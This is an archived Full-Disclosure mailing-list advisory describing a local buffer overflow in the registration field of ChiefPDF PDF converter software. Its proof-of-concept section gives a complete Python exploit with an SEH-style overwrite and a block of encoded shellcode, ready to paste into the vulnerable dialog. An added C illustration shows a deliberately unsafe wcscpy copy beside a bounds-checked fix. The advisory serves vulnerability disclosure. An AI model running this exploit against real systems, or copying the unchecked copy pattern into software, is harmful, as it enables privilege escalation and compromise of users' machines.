
List:       full-disclosure
Subject:    [FD] ChiefPDF Software v2.x - Buffer Overflow Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2015-08-20 12:32:02
Message-ID: 55D5C8C2.7050100 () vulnerability-lab ! com

Document Title:
===============
ChiefPDF Software v2.x - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1578


Release Date:
=============
2015-08-20


Vulnerability Laboratory ID (VL-ID):
====================================
1578


Common Vulnerability Scoring System:
====================================
7.3


Product & Service Introduction:
===============================
High Volume Batch OCR Conversion.
High Performance TIFF to PDF OCR. High-Volume Tiff To PDF Conversions. Find Out How Easy it Can Be! Convert scanned documents & images. Searchable PDF.

(Copy of the Vendor Homepage: http://www.chiefpdf.com & http://www.soft32.com/publishers/chiefpdf/)


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the official ChiefPDF Software Clients v2.0.


Vulnerability Disclosure Timeline:
==================================
2015-08-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
ChiefPDF Software
Product: PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF to Tiff Converter 2.0 & PDF to Tiff Converter Free 2.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official ChiefPDF Software Clients v2.0. The vulnerability can be exploited by local attackers to compromise a target system or to gain higher access privileges for further exploitation.

The buffer overflow is located in the `Registration - License Name` input field of the software client. The issue is a classic unicode buffer overflow that allows an attacker to compromise the local system. The vulnerability affects all of the vendor's software clients: PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF to Tiff Converter 2.0 and PDF to Tiff Converter Free 2.0.

The security risk of the buffer overflow vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) score of 7.3. Exploitation requires a low-privileged system user account and no user interaction. Successful exploitation results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
				[+] Registration - License Name

Vulnerable Program(s):
				[+] PDF to Image Converter 2.0
				[+] PDF to Image Converter Free 2.0
				[+] PDF to Tiff Converter 2.0
				[+] PDF to Tiff Converter Free 2.0
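As an added illustration (not code from the advisory or from ChiefPDF), this C sketch contrasts the unchecked-copy pattern behind this class of bug with a bounds-checked replacement. The buffer size, function names and the constructed inputs are assumptions, since the advisory does not show the vendor's code.

```c
#include <stddef.h>
#include <string.h>
#include <wchar.h>

/* Hypothetical buffer size: the advisory gives no real size, only that
 * 544 bytes of 'A' overrun it. */
#define LICENSE_NAME_MAX 64

/* Vulnerable pattern: unbounded copy of the dialog input into a fixed
 * stack buffer; a name of LICENSE_NAME_MAX or more wide characters
 * writes past the end (undefined behaviour). */
int register_license_unsafe(const wchar_t *name)
{
    wchar_t buf[LICENSE_NAME_MAX];
    wcscpy(buf, name);               /* no length check at all */
    return buf[0] != L'\0';          /* 1 = name accepted */
}

/* Hardened form: measure with a bound, reject anything that would not
 * fit together with its terminator, then copy exactly that length. */
int register_license_safe(const wchar_t *name)
{
    wchar_t buf[LICENSE_NAME_MAX];
    size_t len = 0;
    if (name == NULL)
        return 0;
    while (len < LICENSE_NAME_MAX && name[len] != L'\0')
        len++;                       /* never scans past the bound */
    if (len == 0 || len >= LICENSE_NAME_MAX)
        return 0;                    /* empty or over-long: rejected */
    memcpy(buf, name, (len + 1) * sizeof(wchar_t));
    return buf[0] != L'\0';
}

/* Demo helper: a constructed name of n 'A' characters, the same shape
 * as the advisory's "A" * 544 input, run through the hardened check. */
int check_constructed_name(size_t n)
{
    static wchar_t name[1024];
    size_t i;
    if (n >= 1024)
        return -1;
    for (i = 0; i < n; i++)
        name[i] = L'A';
    name[n] = L'\0';
    return register_license_safe(name);
}
```

The hardened check is what a registration dialog should do before the name ever reaches a fixed-size buffer; the unsafe function is only called with short input here.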


Proof of Concept (PoC):
=======================
The local buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. For a security demonstration, or to reproduce the issue, follow the information and steps below.

PoC: ChiefPDF.py

#!/usr/bin/python
#Exploit Title:ChiefPDF Software Buffer Overflow 
#vulnerable programs:
#PDF to Image Converter 2.0
#PDF to Image Converter Free 2.0
#PDF to Tiff Converter 2.0
#PDF to Tiff Converter Free 2.0
#Software Link:http://www.soft32.com/publishers/chiefpdf/
#Author: metacom - twitter.com/m3tac0m
#Tested on: Win-Xp-sp3, Win-7, Win-8.1

#How to use: Copy the AAAA...+ string from regkey.txt and paste -> Registration - License Name: (input)
#Note: Python 2 syntax (str literals are written to the file as raw bytes)
buffer="A" * 544
buffer+="\xeb\x06\x90\x90"
buffer+="\x8B\x89\x03\x10"# 1003898B   5E   POP ESI 
buffer+="\x90" * 80
buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e"
"\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6"
"\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19"
"\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c"
"\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7"
"\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9"
"\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67"
"\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4"
"\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5"
"\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66"
"\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37"
"\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20"
"\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4"
"\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c"
"\xea\x47")
# write the assembled string to regkey.txt for pasting into the dialog
with open('regkey.txt','wb') as out:
    out.write(buffer)


Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the ChiefPDF software clients is estimated as high. (CVSS 7.3)


Credits & Authors:
==================
metacom  - [http://www.vulnerability-lab.com/show.php?user=metacom]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

